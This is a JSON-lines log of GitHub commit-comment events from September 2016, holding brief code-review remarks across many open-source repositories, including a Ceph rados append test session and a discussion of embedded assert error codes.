{"id":"4535419295","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18949089,"position":null,"line":null,"path":null,"commit_id":"5862e54c1da8c8589ddb5540db8ea627ded2ed90","created_at":"2016-09-08T17:16:56Z","updated_at":"2016-09-08T17:16:56Z","body":":+1:\r\nThe 6x improvement calculation is based on what number of users and what operation?"}},"created_at":"2016-09-08T17:16:56Z"}
{"id":"4535422793","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"SkriptPL/SkriptDrop"},"payload":{"comment":{"id":18949100,"position":34,"line":62,"path":"src/main/java/pl/skript/drop/SkriptDrop.java","commit_id":"ac4f1c5e0fcc1ea68bdf631888d8de985d0a910d","created_at":"2016-09-08T17:17:36Z","updated_at":"2016-09-08T17:17:36Z","body":":ok_hand: "}},"created_at":"2016-09-08T17:17:36Z"}
{"id":"4535423345","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"binky123/Stockfish"},"payload":{"comment":{"id":18949101,"position":null,"line":null,"path":null,"commit_id":"c304f8103bb419c1e1baf911ef4efd331594f9ab","created_at":"2016-09-08T17:17:42Z","updated_at":"2016-09-08T17:17:42Z","body":"Didn't you intend\r\n\r\n    ! (pos.see_sign(move) < VALUE_ZERO)\r\n\r\nWithout the parenthesis you are negating the integer see_sign() function"}},"created_at":"2016-09-08T17:17:42Z"}
{"id":"4535427256","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18949118,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T17:18:27Z","updated_at":"2016-09-08T17:18:27Z","body":" Could you please create a Teamviewer account so that I can log it in a user account that I created for you in my laptop."}},"created_at":"2016-09-08T17:18:27Z"}
{"id":"4535431544","type":"CommitCommentEvent","actor":{"login":"filipedumas"},"repo":{"name":"profound-labs/its-essential-meaning"},"payload":{"comment":{"id":18949125,"position":null,"line":null,"path":null,"commit_id":"e6657d5cc92110384f27410b6652e926bcd773b8","created_at":"2016-09-08T17:19:16Z","updated_at":"2016-09-08T17:19:16Z","body":"Apparently DS_Store files were included in this commit.\r\nI don't really understand how they came to be.\r\nI found [this](http://stackoverflow.com/questions/107701/how-can-i-remove-ds-store-files-from-a-git-repository) which might be useful, if necessary."}},"created_at":"2016-09-08T17:19:16Z"}
{"id":"4535432228","type":"CommitCommentEvent","actor":{"login":"junjun-zhang"},"repo":{"name":"ICGC-TCGA-PanCancer/s3-data-qc"},"payload":{"comment":{"id":18949131,"position":null,"line":null,"path":null,"commit_id":"38b959b41c1bab8f489c713938a173144cf5a336","created_at":"2016-09-08T17:19:23Z","updated_at":"2016-09-08T17:19:23Z","body":"@lindaxiang, make sure you expire the token"}},"created_at":"2016-09-08T17:19:23Z"}
{"id":"4535434642","type":"CommitCommentEvent","actor":{"login":"wcatron"},"repo":{"name":"wcatron/ionic-cloud-sdk-php"},"payload":{"comment":{"id":18949143,"position":23,"line":13,"path":"src/Helpers/HttpHandler.php","commit_id":"bad1f90c294146d6893dbb7e8d86553c37f90e13","created_at":"2016-09-08T17:19:50Z","updated_at":"2016-09-08T17:19:50Z","body":"Yes. #5"}},"created_at":"2016-09-08T17:19:50Z"}
{"id":"4535435519","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18949149,"position":93,"line":138,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-08T17:20:00Z","updated_at":"2016-09-08T17:20:00Z","body":"what does this note mean?"}},"created_at":"2016-09-08T17:20:00Z"}
{"id":"4535437186","type":"CommitCommentEvent","actor":{"login":"santi-pdp"},"repo":{"name":"fchollet/keras"},"payload":{"comment":{"id":18949157,"position":null,"line":null,"path":null,"commit_id":"25874ceab26bd9e08e532c442dc845bccf0590d5","created_at":"2016-09-08T17:20:18Z","updated_at":"2016-09-08T17:20:18Z","body":"Hello @fchollet, in my case this change raised an error in these lines:\r\nException: When specifying `unroll=True`, an `input_length` must be provided to `rnn`.\r\nI am specifying the batch_input_shape in the first layer which is TD because afterwards there are some LSTM layers (stateful ones). Adding the input_length=input_shape[1] works for me.\r\nThanks!"}},"created_at":"2016-09-08T17:20:18Z"}
{"id":"4535437247","type":"CommitCommentEvent","actor":{"login":"noubis"},"repo":{"name":"noubis/Getting-and-Cleaning-Data"},"payload":{"comment":{"id":18949159,"position":null,"line":null,"path":null,"commit_id":"dd6aab256be5747fd0fc906bf916cbd2ae69e26b","created_at":"2016-09-08T17:20:19Z","updated_at":"2016-09-08T17:20:19Z","body":"You should create one R script called run_analysis.R that does the following.\r\n1.\tMerges the training and the test sets to create one data set.\r\n2.\tExtracts only the measurements on the mean and standard deviation for each measurement.\r\n3.\tUses descriptive activity names to name the activities in the data set\r\n4.\tAppropriately labels the data set with descriptive variable names.\r\n5.\tFrom the data set in step 4, creates a second, independent tidy data set with the average of each variable for each activity and each subject.\r\n"}},"created_at":"2016-09-08T17:20:19Z"}
{"id":"4535440334","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18949165,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T17:20:54Z","updated_at":"2016-09-08T17:20:54Z","body":"Sure.\r\nDone! What details do you need? \r\nAnd thanks again, I could do AOSP for kenzo I guess."}},"created_at":"2016-09-08T17:20:54Z"}
{"id":"4535440501","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18949166,"position":95,"line":140,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-08T17:20:56Z","updated_at":"2016-09-08T17:20:56Z","body":"make sure to keep your indentation standard"}},"created_at":"2016-09-08T17:20:56Z"}
{"id":"4535445069","type":"CommitCommentEvent","actor":{"login":"billsmith"},"repo":{"name":"indeedeng/codecache-datadog"},"payload":{"comment":{"id":18949181,"position":26,"line":26,"path":"src/main/java/com/indeed/example/CodeCacheDataDog.java","commit_id":"7097f4defed57ff4d9c9771528a8c14dd0508ed7","created_at":"2016-09-08T17:21:48Z","updated_at":"2016-09-08T17:21:48Z","body":"Done."}},"created_at":"2016-09-08T17:21:48Z"}
{"id":"4535445959","type":"CommitCommentEvent","actor":{"login":"lucasoli"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18949186,"position":null,"line":null,"path":null,"commit_id":"d62f422e3d951a50bb0b71d0dc69143eace970f9","created_at":"2016-09-08T17:21:57Z","updated_at":"2016-09-08T17:21:57Z","body":"@Atemo Wow, that's new to me! I didn't know about the hiding target not triggering this event... can you update the doc/script_commands.txt to match the correct behavior?"}},"created_at":"2016-09-08T17:21:57Z"}
{"id":"4535449055","type":"CommitCommentEvent","actor":{"login":"FreeCX"},"repo":{"name":"dead-pine-inc/book-of-the-idea-out"},"payload":{"comment":{"id":18949196,"position":null,"line":null,"path":null,"commit_id":"04ffa7cc114e8e9ef9e251378408020ff9cd5a85","created_at":"2016-09-08T17:22:31Z","updated_at":"2016-09-08T17:22:31Z","body":"@Antoniii добавь ещё картинку `ideas`, а то она на остаётся закомментированной в файле `book_of_the_idea_out.tex`"}},"created_at":"2016-09-08T17:22:31Z"}
{"id":"4535449915","type":"CommitCommentEvent","actor":{"login":"tomy-ac"},"repo":{"name":"tomy-ac/ceph"},"payload":{"comment":{"id":18949198,"position":null,"line":null,"path":null,"commit_id":"77454071cfeaec4f82bec8ccacc3854f16a52cd6","created_at":"2016-09-08T17:22:40Z","updated_at":"2016-09-08T17:22:40Z","body":"$ ./bin/rados --help\r\n...\r\nOBJECT COMMANDS\r\n   get <obj-name> [outfile]         fetch object\r\n   put <obj-name> [infile]          write object\r\n   append <obj-name> [infile]       append object\r\n   truncate <obj-name> length       truncate object\r\n...\r\n\r\n$ ../src/vstart.sh -X -d -l -n\r\n...\r\n$ ./bin/ceph -s\r\n*** DEVELOPER MODE: setting PATH, PYTHONPATH and LD_LIBRARY_PATH ***\r\n2016-09-08 22:33:08.730991 7f4a7065f700 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n2016-09-08 22:33:08.737034 7f4a7065f700 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n    cluster 430b79e6-b453-43dd-bacb-1c488b9f4a7e\r\n     health HEALTH_OK\r\n     monmap e1: 3 mons at {a=127.0.0.1:6789/0,b=127.0.0.1:6790/0,c=127.0.0.1:6791/0}\r\n            election epoch 6, quorum 0,1,2 a,b,c\r\n      fsmap e4: 1/1/1 up {0=a=up:active}, 2 up:standby\r\n     osdmap e10: 3 osds: 3 up, 3 in\r\n            flags sortbitwise,require_jewel_osds,require_kraken_osds\r\n      pgmap v14: 24 pgs, 3 pools, 2148 bytes data, 16 objects\r\n            114 GB used, 1002 GB / 1117 GB avail\r\n                  24 active+clean\r\n  client io 1460 B/s wr, 0 op/s rd, 5 op/s wr\r\n$ ./bin/ceph osd pool create reppool 100 100\r\n*** DEVELOPER MODE: setting PATH, PYTHONPATH and LD_LIBRARY_PATH ***\r\n2016-09-08 22:34:45.934020 7ff9c1a39700 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n2016-09-08 22:34:45.955288 7ff9c1a39700 -1 WARNING: the following dangerous and experimental features are enabled: *\r\npool 'reppool' created\r\n$ ll /home/ems/trandom_0\r\n-rw-rw-r-- 1 ems ems 0 Sep  8 21:30 /home/ems/trandom_0\r\n$ ./bin/rados -p reppool append t0 /home/ems/trandom_0\r\n2016-09-08 22:36:15.645738 7ff3ec7beac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n2016-09-08 22:36:15.646117 7ff3ec7beac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n2016-09-08 22:36:15.649197 7ff3ec7beac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n$ ./bin/rados -p reppool get t0 /home/ems/trandom_0_out\r\n2016-09-08 22:37:00.371874 7fabfb744ac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n2016-09-08 22:37:00.372293 7fabfb744ac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n2016-09-08 22:37:00.375322 7fabfb744ac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n$ ll /home/ems/trandom_0_out\r\n-rw-r--r-- 1 ems ems 0 Sep  8 22:37 /home/ems/trandom_0_out\r\n$ diff /home/ems/trandom_0 /home/ems/trandom_0_out\r\n$ ll /home/ems/trandom_4k\r\n-rw-rw-r-- 1 ems ems 4096 Aug  2 13:25 /home/ems/trandom_4k\r\n$ ./bin/rados -p reppool append t0 /home/ems/trandom_4k\r\n2016-09-08 22:38:15.049607 7f061248eac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n2016-09-08 22:38:15.050039 7f061248eac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n2016-09-08 22:38:15.053103 7f061248eac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n$ ./bin/rados -p reppool append t0 /home/ems/trandom_4k\r\n2016-09-08 22:38:15.049607 7f061248eac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n2016-09-08 22:38:15.050039 7f061248eac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n2016-09-08 22:38:15.053103 7f061248eac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n$ ./bin/rados -p reppool get t0 /home/ems/trandom_0_out\r\n2016-09-08 22:38:29.837062 7efc03136ac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n2016-09-08 22:38:29.837330 7efc03136ac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n2016-09-08 22:38:29.840092 7efc03136ac0 -1 WARNING: the following dangerous and experimental features are enabled: *\r\n$ ll /home/ems/trandom_0_out\r\n-rw-r--r-- 1 ems ems 8192 Sep  8 22:38 /home/ems/trandom_0_out\r\n"}},"created_at":"2016-09-08T17:22:40Z"}
{"id":"4535452449","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18949207,"position":68,"line":68,"path":"src/xpcc/architecture/interface/assert.hpp","commit_id":"2fd56738037694722281a5dca0d0480ae16c1549","created_at":"2016-09-08T17:23:11Z","updated_at":"2016-09-08T17:23:11Z","body":"I've considered making `xpcc_assert` a macro, so that we can place the string in Flash for AVRs, then read it in a stack-local buffer and pass it to the handlers. The strings would then have to have a limit though."}},"created_at":"2016-09-08T17:23:11Z"}
{"id":"4535454557","type":"CommitCommentEvent","actor":{"login":"araykopotay"},"repo":{"name":"gmilos/swift"},"payload":{"comment":{"id":18949213,"position":23,"line":23,"path":"test/Runtime/linux-fatal-backtrace.swift","commit_id":"d10146592d6188c5526ca51d994930381d9c6c5c","created_at":"2016-09-08T17:23:33Z","updated_at":"2016-09-08T17:23:33Z","body":"+"}},"created_at":"2016-09-08T17:23:33Z"}
{"id":"4535458859","type":"CommitCommentEvent","actor":{"login":"jchan005"},"repo":{"name":"gbuddappagari/mnemosyne"},"payload":{"comment":{"id":18949224,"position":15,"line":15,"path":"src/addMACData.js","commit_id":"6dd33daff738a4babe8b9ca7ae94bc2835d0810e","created_at":"2016-09-08T17:24:20Z","updated_at":"2016-09-08T17:24:20Z","body":"Please don't mix using the '_' convention with camel case convention."}},"created_at":"2016-09-08T17:24:20Z"}
{"id":"4535461369","type":"CommitCommentEvent","actor":{"login":"ekiwi"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18949243,"position":68,"line":68,"path":"src/xpcc/architecture/interface/assert.hpp","commit_id":"2fd56738037694722281a5dca0d0480ae16c1549","created_at":"2016-09-08T17:24:48Z","updated_at":"2016-09-08T17:24:48Z","body":"There has to be a way to represent these with integer values. Remember, we spent about three months to come up with a clock interface (which still isn't done)."}},"created_at":"2016-09-08T17:24:48Z"}
{"id":"4535462483","type":"CommitCommentEvent","actor":{"login":"bantuist"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18949248,"position":38,"line":83,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-08T17:25:01Z","updated_at":"2016-09-08T17:25:01Z","body":"I see. What does it mean to be extendable here? Extended to what?"}},"created_at":"2016-09-08T17:25:01Z"}
{"id":"4535464198","type":"CommitCommentEvent","actor":{"login":"sorbits"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18949251,"position":207,"line":125,"path":"Frameworks/OakAppKit/src/OakPopOutAnimation.mm","commit_id":"dd3ebefe3f60b323af5a6b1e104c04b43da78eeb","created_at":"2016-09-08T17:25:19Z","updated_at":"2016-09-08T17:25:19Z","body":"> How about breaking the cycle (delegate = nil) after closing the window?\r\n\r\nSince the animation group gets copied, I don’t think we can do that. The `CAAnimation`  object sent to `animationDidStop:` is immutable."}},"created_at":"2016-09-08T17:25:19Z"}
{"id":"4535467713","type":"CommitCommentEvent","actor":{"login":"wcatron"},"repo":{"name":"wcatron/ionic-cloud-sdk-php"},"payload":{"comment":{"id":18949265,"position":13,"line":13,"path":"src/API/API.php","commit_id":"bad1f90c294146d6893dbb7e8d86553c37f90e13","created_at":"2016-09-08T17:25:59Z","updated_at":"2016-09-08T17:25:59Z","body":"Okay, #6 this may need more refactoring."}},"created_at":"2016-09-08T17:25:59Z"}
{"id":"4535468320","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18949269,"position":null,"line":null,"path":null,"commit_id":"2fd56738037694722281a5dca0d0480ae16c1549","created_at":"2016-09-08T17:26:07Z","updated_at":"2016-09-08T17:26:07Z","body":"> There has to be a way to represent these with integer values. \r\n\r\nAnd a generated switch statement to turn them into strings so they can be printed ;-P"}},"created_at":"2016-09-08T17:26:07Z"}
{"id":"4535469298","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18949273,"position":68,"line":68,"path":"src/xpcc/architecture/interface/assert.hpp","commit_id":"2fd56738037694722281a5dca0d0480ae16c1549","created_at":"2016-09-08T17:26:17Z","updated_at":"2016-09-08T17:26:17Z","body":"> There has to be a way to represent these with integer values.\r\n\r\nAnd a generated switch statement to turn them into strings so they can be printed ;-P"}},"created_at":"2016-09-08T17:26:17Z"}
{"id":"4535472161","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18949291,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T17:26:49Z","updated_at":"2016-09-08T17:26:49Z","body":"A Teamviewer account of couse, just need it to log it in in my laptop so you could use your main Teamviewer account to control it."}},"created_at":"2016-09-08T17:26:49Z"}
{"id":"4535474677","type":"CommitCommentEvent","actor":{"login":"ekiwi"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18949292,"position":68,"line":68,"path":"src/xpcc/architecture/interface/assert.hpp","commit_id":"2fd56738037694722281a5dca0d0480ae16c1549","created_at":"2016-09-08T17:27:19Z","updated_at":"2016-09-08T17:27:19Z","body":"> And a generated switch statement to turn them into strings so they can be printed ;-P\r\n\r\nYes, as an option if there is a serial output. Remember that xpcc is meant to work for embedded devices where you might not be able to assume that there is a serial out."}},"created_at":"2016-09-08T17:27:19Z"}
{"id":"4535476688","type":"CommitCommentEvent","actor":{"login":"dyemanov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18949296,"position":null,"line":null,"path":null,"commit_id":"fb40f1eb2ed0d9dab47712b5d9320cf5a0ffc15d","created_at":"2016-09-08T17:27:43Z","updated_at":"2016-09-08T17:27:43Z","body":"Yes, please."}},"created_at":"2016-09-08T17:27:43Z"}
{"id":"4535477240","type":"CommitCommentEvent","actor":{"login":"bantuist"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18949299,"position":39,"line":84,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-08T17:27:49Z","updated_at":"2016-09-08T17:27:49Z","body":"I don't understand. Is this related to making the function extendable? Should I be declaring a variable for the className instead of the parent?"}},"created_at":"2016-09-08T17:27:49Z"}
{"id":"4535484390","type":"CommitCommentEvent","actor":{"login":"jchan005"},"repo":{"name":"gbuddappagari/mnemosyne"},"payload":{"comment":{"id":18949314,"position":13,"line":13,"path":"src/addMACData.js","commit_id":"6dd33daff738a4babe8b9ca7ae94bc2835d0810e","created_at":"2016-09-08T17:29:09Z","updated_at":"2016-09-08T17:29:09Z","body":"Documentation on what parameters are expected in the input would be nice."}},"created_at":"2016-09-08T17:29:09Z"}
{"id":"4535486647","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18949320,"position":68,"line":68,"path":"src/xpcc/architecture/interface/assert.hpp","commit_id":"2fd56738037694722281a5dca0d0480ae16c1549","created_at":"2016-09-08T17:29:33Z","updated_at":"2016-09-08T17:29:33Z","body":"You'd have to use an `uint16_t`, and make the upper 8-bit the namespace for the peripheral and the lower 8-bit the reason.\r\nIt would have to be extensible so that drivers outside of xpcc can provide their own error codes."}},"created_at":"2016-09-08T17:29:33Z"}
{"id":"4535488122","type":"CommitCommentEvent","actor":{"login":"evert"},"repo":{"name":"fruux/Baikal"},"payload":{"comment":{"id":18949327,"position":null,"line":null,"path":null,"commit_id":"6e311126dd31d918cf93c3095c74bdf786fb55b6","created_at":"2016-09-08T17:29:50Z","updated_at":"2016-09-08T17:29:50Z","body":"Because it breaks a query like `synctoken = synctoken +1`."}},"created_at":"2016-09-08T17:29:50Z"}
{"id":"4535489753","type":"CommitCommentEvent","actor":{"login":"nwspeete-ibm"},"repo":{"name":"nwspeete-ibm/openwhisk"},"payload":{"comment":{"id":18949329,"position":1,"line":1,"path":"services/restify/Dockerfile","commit_id":"bb4f2f1dd570f1f706ac1fc6ca2556f96c9ffb9d","created_at":"2016-09-08T17:30:11Z","updated_at":"2016-09-08T17:30:11Z","body":"This Dockerfile will need to be updated to fit our scala web service setup. https://github.ibm.com/BlueMix-Fabric/bluewhisk/blob/master/blue/services/statsD/Dockerfile has another Dockerfile example for whisk."}},"created_at":"2016-09-08T17:30:11Z"}
{"id":"4535490774","type":"CommitCommentEvent","actor":{"login":"jchan005"},"repo":{"name":"gbuddappagari/mnemosyne"},"payload":{"comment":{"id":18949331,"position":11,"line":11,"path":"src/registerWebhook.js","commit_id":"6dd33daff738a4babe8b9ca7ae94bc2835d0810e","created_at":"2016-09-08T17:30:22Z","updated_at":"2016-09-08T17:30:22Z","body":"This is a public repository....... and you've committed secrets."}},"created_at":"2016-09-08T17:30:22Z"}
{"id":"4535493817","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18949339,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T17:30:54Z","updated_at":"2016-09-08T17:30:54Z","body":"Yeah done that already.\r\nAnyway do you have FB account or something like that? we could continue there?"}},"created_at":"2016-09-08T17:30:54Z"}
{"id":"4535494044","type":"CommitCommentEvent","actor":{"login":"jgrom"},"repo":{"name":"jgrom/hello_github"},"payload":{"comment":{"id":18949340,"position":null,"line":null,"path":null,"commit_id":"a8e84650c2f598aeebe2e632542308f19349b194","created_at":"2016-09-08T17:30:57Z","updated_at":"2016-09-08T17:30:57Z","body":"== TO DO ==\r\nCorriger :\r\n- git push origin master\r\n+ git push -u origin master\r\n\r\net mettre des balises markdown\r\n"}},"created_at":"2016-09-08T17:30:57Z"}
{"id":"4535494278","type":"CommitCommentEvent","actor":{"login":"MorbZ"},"repo":{"name":"MorbZ/OSMonaut"},"payload":{"comment":{"id":18949341,"position":6,"line":76,"path":"src/main/java/net/morbz/osmonaut/Osmonaut.java","commit_id":"92360193001dd26b1defb916d74ad1b5661967f9","created_at":"2016-09-08T17:30:59Z","updated_at":"2016-09-08T17:30:59Z","body":"Why use min here?"}},"created_at":"2016-09-08T17:30:59Z"}
{"id":"4535497080","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18949346,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T17:31:32Z","updated_at":"2016-09-08T17:31:32Z","body":"ngoquang2708@gmail.com"}},"created_at":"2016-09-08T17:31:32Z"}
{"id":"4535498210","type":"CommitCommentEvent","actor":{"login":"Marsupio"},"repo":{"name":"siacs/Conversations"},"payload":{"comment":{"id":18949350,"position":null,"line":null,"path":null,"commit_id":"e1d2c32e63d6f2276b56600945569dede3e34890","created_at":"2016-09-08T17:31:45Z","updated_at":"2016-09-08T17:31:45Z","body":"Maybe **SEVRER**_NOT_FOUND should be SERVER_NOT_FOUND"}},"created_at":"2016-09-08T17:31:45Z"}
{"id":"4535503055","type":"CommitCommentEvent","actor":{"login":"Youngcodesavage5714"},"repo":{"name":"DFSoul/Dosshighschool"},"payload":{"comment":{"id":18949356,"position":null,"line":null,"path":null,"commit_id":"f10d88aacae28cab2d8995327a48cc9403d93897","created_at":"2016-09-08T17:32:39Z","updated_at":"2016-09-08T17:32:39Z","body":"color change"}},"created_at":"2016-09-08T17:32:39Z"}
{"id":"4535504875","type":"CommitCommentEvent","actor":{"login":"ashercodeorg"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":18949361,"position":null,"line":null,"path":null,"commit_id":"927bafb65f1e316209f05f5353ce2d59f9980644","created_at":"2016-09-08T17:33:00Z","updated_at":"2016-09-08T17:33:00Z","body":"Has this been removed from all ENVs? Can this be purged?"}},"created_at":"2016-09-08T17:33:00Z"}
{"id":"4535506535","type":"CommitCommentEvent","actor":{"login":"xipki"},"repo":{"name":"bcgit/bc-java"},"payload":{"comment":{"id":18949370,"position":null,"line":null,"path":null,"commit_id":"b5e2855773858bed46761a84c215bab7df6abe23","created_at":"2016-09-08T17:33:20Z","updated_at":"2016-09-08T17:33:20Z","body":"I think this fix should be reversed. Have commented also Issue BJA-623 in the BC Jira system."}},"created_at":"2016-09-08T17:33:20Z"}
{"id":"4535509273","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"Qthreads/qthreads"},"payload":{"comment":{"id":18949379,"position":null,"line":null,"path":null,"commit_id":"71c812a2c5215d691273f921ef6a1f2970c19d6d","created_at":"2016-09-08T17:33:51Z","updated_at":"2016-09-08T17:33:51Z","body":"@stelleg This test is failing for me 1/5 times on my mac"}},"created_at":"2016-09-08T17:33:51Z"}
{"id":"4535513434","type":"CommitCommentEvent","actor":{"login":"araykopotay"},"repo":{"name":"toolstack/git-to-wp-plugin-dir-release-script"},"payload":{"comment":{"id":18949384,"position":5,"line":38,"path":"class.release.php","commit_id":"13aae838faf6f6b567f3ba3dc46d6fc3a4556ee3","created_at":"2016-09-08T17:34:40Z","updated_at":"2016-09-08T17:34:40Z","body":"+"}},"created_at":"2016-09-08T17:34:40Z"}
{"id":"4535515044","type":"CommitCommentEvent","actor":{"login":"araykopotay"},"repo":{"name":"toolstack/git-to-wp-plugin-dir-release-script"},"payload":{"comment":{"id":18949388,"position":null,"line":null,"path":null,"commit_id":"13aae838faf6f6b567f3ba3dc46d6fc3a4556ee3","created_at":"2016-09-08T17:34:58Z","updated_at":"2016-09-08T17:34:58Z","body":"13aae83"}},"created_at":"2016-09-08T17:34:58Z"}
{"id":"4535517498","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18949392,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T17:35:27Z","updated_at":"2016-09-08T17:35:27Z","body":"Check for friend requests..."}},"created_at":"2016-09-08T17:35:27Z"}
{"id":"4535518713","type":"CommitCommentEvent","actor":{"login":"sharedprophet"},"repo":{"name":"sharedprophet/git-plus"},"payload":{"comment":{"id":18949397,"position":null,"line":null,"path":null,"commit_id":"67a037b2c61ee64044c03271cd58e84a7afaf584","created_at":"2016-09-08T17:35:41Z","updated_at":"2016-09-08T17:35:41Z","body":"This will break the current coloring when disabled, because I changed the scope names and updated the less file. It would be better to leave grammars/diff.cson out and if this is disabled, call ```atom.grammars.loadGrammar(path.join(__dirname, 'grammars', 'diff.json'))```."}},"created_at":"2016-09-08T17:35:41Z"}
{"id":"4535519284","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18949401,"position":5,"line":107,"path":"application/src/main/webapp/js/desktopNotification.js","commit_id":"73e7712390b7b0e79dd02fbc69c6e24973d599aa","created_at":"2016-09-08T17:35:48Z","updated_at":"2016-09-08T17:35:48Z","body":"I am not sure to understand why we do this here. Doesn't the keywords contain only the keywords and a simple check on whether it is empty or not is sufficient ?"}},"created_at":"2016-09-08T17:35:48Z"}
{"id":"4535522330","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18949414,"position":null,"line":null,"path":null,"commit_id":"44a94d22d5e73d470a2383b496c59ac4e941346d","created_at":"2016-09-08T17:36:23Z","updated_at":"2016-09-08T17:36:23Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T17:36:23Z"}
{"id":"4535523815","type":"CommitCommentEvent","actor":{"login":"petemoore"},"repo":{"name":"taskcluster/docker-worker"},"payload":{"comment":{"id":18949420,"position":null,"line":null,"path":null,"commit_id":"beaa5701942eb033c7f9379010b1f6d320777a1a","created_at":"2016-09-08T17:36:40Z","updated_at":"2016-09-08T17:36:40Z","body":"Retriggered failed task: https://tools.taskcluster.net/task-inspector/#crEZJh63QQqLvBXblrDDZQ/0"}},"created_at":"2016-09-08T17:36:40Z"}
{"id":"4535526698","type":"CommitCommentEvent","actor":{"login":"athanatos"},"repo":{"name":"tomy-ac/ceph"},"payload":{"comment":{"id":18949427,"position":null,"line":null,"path":null,"commit_id":"77454071cfeaec4f82bec8ccacc3854f16a52cd6","created_at":"2016-09-08T17:37:13Z","updated_at":"2016-09-08T17:37:13Z","body":"Add tests to qa/workunits/cephtool/test.sh"}},"created_at":"2016-09-08T17:37:13Z"}
